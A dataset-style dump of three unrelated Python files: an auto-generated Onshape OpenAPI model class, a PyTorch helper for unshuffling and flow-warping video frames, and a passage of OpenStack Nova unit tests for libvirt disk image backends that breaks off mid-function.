text
stringlengths 2
999k
|
|---|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_identifier8
except ImportError:
btp_identifier8 = sys.modules["onshape_client.oas.models.btp_identifier8"]
try:
from onshape_client.oas.models import btp_literal_number258
except ImportError:
btp_literal_number258 = sys.modules[
"onshape_client.oas.models.btp_literal_number258"
]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
class BTPConversionFunction1362AllOf(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"_from": (btp_literal_number258.BTPLiteralNumber258,), # noqa: E501
"space_after_type": (btp_space10.BTPSpace10,), # noqa: E501
"to": (btp_literal_number258.BTPLiteralNumber258,), # noqa: E501
"type_name": (btp_identifier8.BTPIdentifier8,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"_from": "from", # noqa: E501
"space_after_type": "spaceAfterType", # noqa: E501
"to": "to", # noqa: E501
"type_name": "typeName", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_conversion_function1362_all_of.BTPConversionFunction1362AllOf - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
_from (btp_literal_number258.BTPLiteralNumber258): [optional] # noqa: E501
space_after_type (btp_space10.BTPSpace10): [optional] # noqa: E501
to (btp_literal_number258.BTPLiteralNumber258): [optional] # noqa: E501
type_name (btp_identifier8.BTPIdentifier8): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class VideoTools:
@staticmethod
def flatten_high(image_high, upscale_factor):
"""
Reshapes the high resolution input image with shape
B x C x H*upscale_factor x W*upscale_factor
to a low resolution output image with shape
B x (C * upscale_factor * upscale_factor) x H x W .
This operation is the inverse of PixelShuffle
"""
#source: https://github.com/pytorch/pytorch/issues/2456
b, c, h, w = image_high.shape
r = upscale_factor
out_channel = c*(r**2)
out_h = h//r
out_w = w//r
fm_view = image_high.contiguous().view(b, c, out_h, r, out_w, r)
fm_prime = fm_view.permute(0,1,3,5,2,4).contiguous().view(b,out_channel, out_h, out_w)
return fm_prime
_offset_cache = dict()
@staticmethod
def _grid_offsets(H, W, dtype, device):
"""
Returns the grid offsets HxWx2 within [-1,1]
"""
if (H,W) in VideoTools._offset_cache:
return VideoTools._offset_cache[(H,W)]
else:
print("Create grid offsets for warping: W=%d, H=%d"%(W, H))
grid_offsetsH = torch.linspace(-1, +1, H, dtype=dtype, device=device)
grid_offsetsW = torch.linspace(-1, +1, W, dtype=dtype, device=device)
grid_offsetsH = torch.unsqueeze(grid_offsetsH, 1)
grid_offsetsW = torch.unsqueeze(grid_offsetsW, 0)
grid_offsets = torch.stack(
torch.broadcast_tensors(grid_offsetsW, grid_offsetsH),
dim=2)
grid_offsets = torch.unsqueeze(grid_offsets, 0) # batch dimension
grid_offsets = grid_offsets.detach()
VideoTools._offset_cache[(H,W)] = grid_offsets
return grid_offsets
@staticmethod
#@profile
def warp_upscale(image_high, flow_low, upscale_factor, special_mask=False):
"""
Warps the high resolution input image with shape
B x C x H*upscale_factor x W*upscale_factor
with the upscaled low resolution flow in screen space with shape
B x 2 x H x W.
Output is the high resolution warped image
If special_mask==True, the first channel is treated as being the mask in range [-1,+1].
This channel is padded with -1, whereas all other channels with zero.
"""
B, C, H, W = flow_low.shape
assert C==2
flow_x, flow_y = torch.chunk(flow_low, 2, dim=1)
flow_x = flow_x * -2.0
flow_y = flow_y * -2.0
flow_low2 = torch.cat((flow_x, flow_y), dim=1)
flow_high = F.interpolate(flow_low2, scale_factor = upscale_factor, mode='bilinear')
flow_high = flow_high.permute(0, 2, 3, 1) # move channels to last position
_, Hhigh, Whigh, _ = flow_high.shape
grid_offsets = VideoTools._grid_offsets(Hhigh, Whigh, flow_high.dtype, flow_high.device)
grid = grid_offsets + flow_high
if special_mask:
image_high = torch.cat([
image_high[:,0:1,:,:]*0.5+0.5,
image_high[:,1:,:,:]], dim=1)
warped_high = F.grid_sample(image_high, grid)
if special_mask:
warped_high = torch.cat([
warped_high[:,0:1,:,:]*2-1,
warped_high[:,1:,:,]], dim=1)
return warped_high
|
# Copyright 2012 Grid Dynamics
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import errno
import os
import shutil
import tempfile
from castellan import key_manager
import ddt
import fixtures
import mock
from oslo_concurrency import lockutils
from oslo_config import fixture as config_fixture
from oslo_service import loopingcall
from oslo_utils import imageutils
from oslo_utils import units
from oslo_utils import uuidutils
from nova.compute import utils as compute_utils
import nova.conf
from nova import context
from nova import exception
from nova import objects
from nova.storage import rbd_utils
from nova import test
from nova.tests.unit import fake_processutils
from nova import utils
from nova.virt.image import model as imgmodel
from nova.virt import images
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import utils as libvirt_utils
CONF = nova.conf.CONF
class FakeSecret(object):
def value(self):
return base64.b64decode("MTIzNDU2Cg==")
class FakeConn(object):
def secretLookupByUUIDString(self, uuid):
return FakeSecret()
@ddt.ddt
class _ImageTestCase(object):
def mock_create_image(self, image):
def create_image(fn, base, size, *args, **kwargs):
fn(target=base, *args, **kwargs)
image.create_image = create_image
def setUp(self):
super(_ImageTestCase, self).setUp()
self.fixture = self.useFixture(config_fixture.Config(lockutils.CONF))
self.INSTANCES_PATH = tempfile.mkdtemp(suffix='instances')
self.fixture.config(disable_process_locking=True,
group='oslo_concurrency')
self.flags(instances_path=self.INSTANCES_PATH)
self.INSTANCE = objects.Instance(id=1, uuid=uuidutils.generate_uuid())
self.DISK_INFO_PATH = os.path.join(self.INSTANCES_PATH,
self.INSTANCE['uuid'], 'disk.info')
self.NAME = 'fake.vm'
self.TEMPLATE = 'template'
self.CONTEXT = context.get_admin_context()
self.PATH = os.path.join(
libvirt_utils.get_instance_path(self.INSTANCE), self.NAME)
# TODO(mikal): rename template_dir to base_dir and template_path
# to cached_image_path. This will be less confusing.
self.TEMPLATE_DIR = os.path.join(CONF.instances_path, '_base')
self.TEMPLATE_PATH = os.path.join(self.TEMPLATE_DIR, 'template')
# Ensure can_fallocate is not initialised on the class
if hasattr(self.image_class, 'can_fallocate'):
del self.image_class.can_fallocate
# This will be used to mock some decorations like utils.synchronize
def _fake_deco(func):
return func
self._fake_deco = _fake_deco
def tearDown(self):
super(_ImageTestCase, self).tearDown()
shutil.rmtree(self.INSTANCES_PATH)
def test_prealloc_image(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('os.access', lambda p, w: True)
with mock.patch.object(image, 'get_disk_size', return_value=self.SIZE):
# Call twice to verify testing fallocate is only called once.
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(),
['fallocate -l 1 %s.fallocate_test' % self.PATH,
'fallocate -n -l %s %s' % (self.SIZE, self.PATH),
'fallocate -n -l %s %s' % (self.SIZE, self.PATH)])
def test_prealloc_image_without_write_access(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
with test.nested(
mock.patch.object(image, 'exists', lambda: True),
mock.patch.object(image, '_can_fallocate', lambda: True),
mock.patch.object(image, 'get_disk_size', lambda _: self.SIZE)
) as (mock_exists, mock_can, mock_get):
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('os.access', lambda p, w: False)
# Testing fallocate is only called when user has write access.
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
def test_libvirt_fs_info(self):
image = self.image_class(self.INSTANCE, self.NAME)
fs = image.libvirt_fs_info("/mnt")
# check that exception hasn't been raised and the method
# returned correct object
self.assertIsInstance(fs, vconfig.LibvirtConfigGuestFilesys)
self.assertEqual(fs.target_dir, "/mnt")
if image.is_block_dev:
self.assertEqual(fs.source_type, "block")
self.assertEqual(fs.source_dev, image.path)
else:
self.assertEqual(fs.source_type, "file")
self.assertEqual(fs.source_file, image.path)
def test_libvirt_info(self):
image = self.image_class(self.INSTANCE, self.NAME)
extra_specs = {
'quota:disk_read_bytes_sec': 10 * units.Mi,
'quota:disk_read_iops_sec': 1 * units.Ki,
'quota:disk_write_bytes_sec': 20 * units.Mi,
'quota:disk_write_iops_sec': 2 * units.Ki,
'quota:disk_total_bytes_sec': 30 * units.Mi,
'quota:disk_total_iops_sec': 3 * units.Ki,
}
disk_info = {
'bus': 'virtio',
'dev': '/dev/vda',
'type': 'cdrom',
}
disk = image.libvirt_info(disk_info,
cache_mode="none",
extra_specs=extra_specs,
hypervisor_version=4004001,
boot_order="1")
self.assertIsInstance(disk, vconfig.LibvirtConfigGuestDisk)
self.assertEqual("/dev/vda", disk.target_dev)
self.assertEqual("virtio", disk.target_bus)
self.assertEqual("none", disk.driver_cache)
self.assertEqual("cdrom", disk.source_device)
self.assertEqual("1", disk.boot_order)
self.assertEqual(10 * units.Mi, disk.disk_read_bytes_sec)
self.assertEqual(1 * units.Ki, disk.disk_read_iops_sec)
self.assertEqual(20 * units.Mi, disk.disk_write_bytes_sec)
self.assertEqual(2 * units.Ki, disk.disk_write_iops_sec)
self.assertEqual(30 * units.Mi, disk.disk_total_bytes_sec)
self.assertEqual(3 * units.Ki, disk.disk_total_iops_sec)
@mock.patch('nova.virt.disk.api.get_disk_size')
def test_get_disk_size(self, get_disk_size):
get_disk_size.return_value = 2361393152
image = self.image_class(self.INSTANCE, self.NAME)
self.assertEqual(2361393152, image.get_disk_size(image.path))
get_disk_size.assert_called_once_with(image.path)
def _test_libvirt_info_scsi_with_unit(self, disk_unit):
# The address should be set if bus is scsi and unit is set.
# Otherwise, it should not be set at all.
image = self.image_class(self.INSTANCE, self.NAME)
disk_info = {
'bus': 'scsi',
'dev': '/dev/sda',
'type': 'disk',
}
disk = image.libvirt_info(disk_info, cache_mode='none', extra_specs={},
hypervisor_version=4004001,
disk_unit=disk_unit)
if disk_unit:
self.assertEqual(0, disk.device_addr.controller)
self.assertEqual(disk_unit, disk.device_addr.unit)
else:
self.assertIsNone(disk.device_addr)
@ddt.data(5, None)
def test_libvirt_info_scsi_with_unit(self, disk_unit):
self._test_libvirt_info_scsi_with_unit(disk_unit)
class FlatTestCase(_ImageTestCase, test.NoDBTestCase):
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Flat
super(FlatTestCase, self).setUp()
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists, mock_ensure):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [False, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
fn(target=self.TEMPLATE_PATH)
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_image_exists(self, mock_exists):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [True, True, True]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_base_dir_exists(self, mock_exists):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [True, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
fn(target=self.TEMPLATE_PATH)
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_template_exists(self, mock_exists):
self.stub_out('nova.virt.libvirt.imagebackend.Flat.correct_format',
lambda _: None)
mock_exists.side_effect = [True, False, True]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH), mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch('os.path.exists')
def test_cache_generating_resize(self, mock_path_exists):
# Test for bug 1608934
# The Flat backend doesn't write to the image cache when creating a
# non-image backend. Test that we don't try to get the disk size of
# a non-existent backend.
base_dir = os.path.join(CONF.instances_path,
CONF.image_cache.subdirectory_name)
# Lets assume the base image cache directory already exists
existing = set([base_dir])
def fake_exists(path):
# Return True only for files previously created during
# execution. This allows us to test that we're not calling
# get_disk_size() on something which hasn't been previously
# created.
return path in existing
def fake_get_disk_size(path):
# get_disk_size will explode if called on a path which doesn't
# exist. Specific exception not important for this test.
if path not in existing:
raise AssertionError
# Not important, won't actually be called by patched code.
return 2 * units.Gi
def fake_template(target=None, **kwargs):
# The template function we pass to cache. Calling this will
# cause target to be created.
existing.add(target)
mock_path_exists.side_effect = fake_exists
image = self.image_class(self.INSTANCE, self.NAME)
# We're not testing preallocation
image.preallocate = False
with test.nested(
mock.patch.object(image, 'exists'),
mock.patch.object(image, 'correct_format'),
mock.patch.object(image, 'get_disk_size'),
mock.patch.object(image, 'resize_image')
) as (
mock_disk_exists, mock_correct_format, mock_get_disk_size,
mock_resize_image
):
# Assume the disk doesn't already exist
mock_disk_exists.return_value = False
# This won't actually be executed since change I46b5658e,
# but this is how the unpatched code will fail. We include this
# here as a belt-and-braces sentinel.
mock_get_disk_size.side_effect = fake_get_disk_size
# Try to create a 2G image
image.cache(fake_template, 'fake_cache_name', 2 * units.Gi)
# The real assertion is that the above call to cache() didn't
# raise AssertionError which, if we get here, it clearly didn't.
self.assertFalse(image.resize_image.called)
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.privsep.path.utime')
def test_create_image(self, mock_utime, mock_sync, mock_copy, mock_extend):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None, image_id=None)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
fn.assert_called_once_with(target=self.TEMPLATE_PATH, image_id=None)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_extend.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch.object(imagebackend.utils, 'synchronized')
def test_create_image_generated(self, mock_sync, mock_copy, mock_extend):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None)
fn.assert_called_once_with(target=self.PATH)
self.assertFalse(mock_copy.called)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_extend.called)
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch('nova.privsep.path.utime')
def test_create_image_extend(self, mock_utime, mock_qemu, mock_sync,
mock_copy, mock_extend):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
mock_qemu.return_value.virtual_size = 1024
fn(target=self.TEMPLATE_PATH, image_id=None)
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH,
self.SIZE, image_id=None)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
self.assertTrue(mock_sync.called)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.PATH, imgmodel.FORMAT_RAW),
self.SIZE)
mock_qemu.assert_called_once_with(self.TEMPLATE_PATH)
mock_utime.assert_called()
@mock.patch.object(os.path, 'exists')
@mock.patch.object(imagebackend.images, 'qemu_img_info')
def test_correct_format(self, mock_qemu, mock_exist):
mock_exist.side_effect = [True, False, True]
info = mock.MagicMock()
info.file_format = 'foo'
mock_qemu.return_value = info
image = self.image_class(self.INSTANCE, self.NAME, path=self.PATH)
self.assertEqual(image.driver_format, 'foo')
mock_qemu.assert_called_once_with(self.PATH)
mock_exist.assert_has_calls([mock.call(self.PATH),
mock.call(self.DISK_INFO_PATH),
mock.call(CONF.instances_path)])
@mock.patch.object(images, 'qemu_img_info',
side_effect=exception.InvalidDiskInfo(
reason='invalid path'))
def test_resolve_driver_format(self, fake_qemu_img_info):
image = self.image_class(self.INSTANCE, self.NAME)
driver_format = image.resolve_driver_format()
self.assertEqual(driver_format, 'raw')
def test_get_model(self):
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.LocalFileImage(self.PATH,
imgmodel.FORMAT_RAW),
model)
class Qcow2TestCase(_ImageTestCase, test.NoDBTestCase):
SIZE = units.Gi
def setUp(self):
self.image_class = imagebackend.Qcow2
super(Qcow2TestCase, self).setUp()
self.QCOW2_BASE = (self.TEMPLATE_PATH +
'_%d' % (self.SIZE / units.Gi))
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists):
mock_exists.side_effect = [False, True, False, True, False, False]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(CONF.instances_path),
mock.call(self.TEMPLATE_DIR),
mock.call(self.INSTANCES_PATH),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image.cache(fn, self.TEMPLATE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_image_exists(self, mock_exists):
mock_exists.side_effect = [False, True, True, True, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_base_dir_exists(self, mock_exists):
mock_exists.side_effect = [False, True, True, False, False]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_template_exists(self, mock_exists):
mock_exists.side_effect = [False, True, True, False, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch('nova.privsep.path.utime')
def test_create_image(self, mock_utime, mock_extend, mock_create,
mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None)
mock_create.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_extend.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Image, 'verify_base_size')
@mock.patch('nova.privsep.path.utime')
def test_create_image_with_size(self, mock_utime, mock_verify, mock_exist,
mock_extend, mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, False, False, False]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_PATH),
mock.call(self.PATH),
mock.call(self.PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, self.SIZE)
mock_create.assert_called_once_with(self.TEMPLATE_PATH, self.PATH)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.PATH, imgmodel.FORMAT_QCOW2),
self.SIZE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_exist.assert_has_calls(exist_calls)
self.assertTrue(mock_sync.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Qcow2, 'get_disk_size')
@mock.patch('nova.privsep.path.utime')
def test_create_image_too_small(self, mock_utime, mock_get, mock_exist,
mock_extend, mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
mock_get.return_value = self.SIZE
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(exception.FlavorDiskSmallerThanImage,
image.create_image, fn, self.TEMPLATE_PATH, 1)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
mock_exist.assert_has_calls(exist_calls)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_create.called)
self.assertFalse(mock_extend.called)
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch('nova.virt.libvirt.utils.get_disk_backing_file')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Image, 'verify_base_size')
@mock.patch('nova.virt.libvirt.utils.copy_image')
@mock.patch('nova.privsep.path.utime')
def test_generate_resized_backing_files(self, mock_utime, mock_copy,
mock_verify, mock_exist,
mock_extend, mock_get,
mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
mock_get.return_value = self.QCOW2_BASE
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, False, True, False, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(CONF.instances_path),
mock.call(self.TEMPLATE_PATH),
mock.call(self.PATH),
mock.call(self.QCOW2_BASE),
mock.call(self.PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_get.assert_called_once_with(self.PATH)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, self.SIZE)
mock_copy.assert_called_once_with(self.TEMPLATE_PATH,
self.QCOW2_BASE)
mock_extend.assert_called_once_with(
imgmodel.LocalFileImage(self.QCOW2_BASE,
imgmodel.FORMAT_QCOW2), self.SIZE)
mock_exist.assert_has_calls(exist_calls)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_create.called)
mock_utime.assert_called()
@mock.patch.object(imagebackend.utils, 'synchronized')
@mock.patch('nova.virt.libvirt.utils.create_cow_image')
@mock.patch('nova.virt.libvirt.utils.get_disk_backing_file')
@mock.patch.object(imagebackend.disk, 'extend')
@mock.patch.object(os.path, 'exists', side_effect=[])
@mock.patch.object(imagebackend.Image, 'verify_base_size')
@mock.patch('nova.privsep.path.utime')
def test_qcow2_exists_and_has_no_backing_file(self, mock_utime,
mock_verify, mock_exist,
mock_extend, mock_get,
mock_create, mock_sync):
mock_sync.side_effect = lambda *a, **kw: self._fake_deco
mock_get.return_value = None
fn = mock.MagicMock()
mock_exist.side_effect = [False, True, False, True, True]
exist_calls = [mock.call(self.DISK_INFO_PATH),
mock.call(self.INSTANCES_PATH),
mock.call(self.TEMPLATE_PATH),
mock.call(self.PATH),
mock.call(self.PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_get.assert_called_once_with(self.PATH)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, self.SIZE)
mock_exist.assert_has_calls(exist_calls)
self.assertTrue(mock_sync.called)
self.assertFalse(mock_create.called)
self.assertFalse(mock_extend.called)
def test_resolve_driver_format(self):
image = self.image_class(self.INSTANCE, self.NAME)
driver_format = image.resolve_driver_format()
self.assertEqual(driver_format, 'qcow2')
def test_get_model(self):
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.LocalFileImage(self.PATH,
imgmodel.FORMAT_QCOW2),
model)
class LvmTestCase(_ImageTestCase, test.NoDBTestCase):
VG = 'FakeVG'
TEMPLATE_SIZE = 512
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Lvm
super(LvmTestCase, self).setUp()
self.flags(images_volume_group=self.VG, group='libvirt')
self.flags(enabled=False, group='ephemeral_storage_encryption')
self.INSTANCE['ephemeral_key_uuid'] = None
self.LV = '%s_%s' % (self.INSTANCE['uuid'], self.NAME)
self.PATH = os.path.join('/dev', self.VG, self.LV)
@mock.patch.object(compute_utils, 'disk_ops_semaphore')
@mock.patch('nova.privsep.utils.supports_direct_io', return_value=True)
@mock.patch.object(imagebackend.lvm, 'create_volume')
@mock.patch.object(imagebackend.disk, 'get_disk_size',
return_value=TEMPLATE_SIZE)
@mock.patch('nova.privsep.qemu.convert_image')
def _create_image(self, sparse, mock_convert_image, mock_get, mock_create,
mock_ignored, mock_disk_op_sema):
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, None)
